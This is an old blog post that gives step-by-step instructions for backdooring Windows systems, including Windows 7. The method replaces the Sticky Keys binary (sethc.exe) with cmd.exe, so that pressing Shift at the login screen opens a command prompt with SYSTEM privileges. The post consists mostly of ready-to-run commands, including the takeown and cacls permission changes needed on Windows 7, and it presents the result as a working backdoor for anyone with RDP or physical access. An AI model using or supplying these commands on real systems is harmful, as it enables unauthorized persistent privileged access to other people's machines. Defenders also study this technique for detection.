0x0Lab Blog Just another damn blog

12Mar/101

Windows simple backdooring

I remember reading this ages ago, and a couple of weeks ago I decided to give it a try.
I was amazed to see not only that this works, but that it even works on Windows7. Granted you do need some extra steps to make this happen in the later.

What I'm talking about is a very simple way to backdoor a Windows system.

To backdoor the system you will need Administrator access to it. For WinXP/2000/2003 you need to do the following. Start cmd.exe and:
> move c:\windows\system32\sethc.exe c:\windows\system32\sethc_old.exe
> copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

In Win7 you need a few extra steps (system32 is finally not world writable). Run as administrator cmd.exe and:
> takeown /f c:\windows\system32\sethc.exe
> cacls c:\windows\system32\sethc.exe /G user:F
> move c:\windows\system32\sethc.exe c:\windows\system32\sethc_old.exe
> copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

That's it. You've successfully backdoored the system.
All that is required to access the backdoor is RDP/physical access to the system.
Upon receiving the login window, you just need to press shift a few times so that your modified sethc.exe is executed. As an added bonus the command prompt that will run will be running with 'nt authority\system' permissions.

Posted by cirrus

Comments (1) Trackbacks (0)
  1. Impressing!


Leave a comment

No trackbacks yet.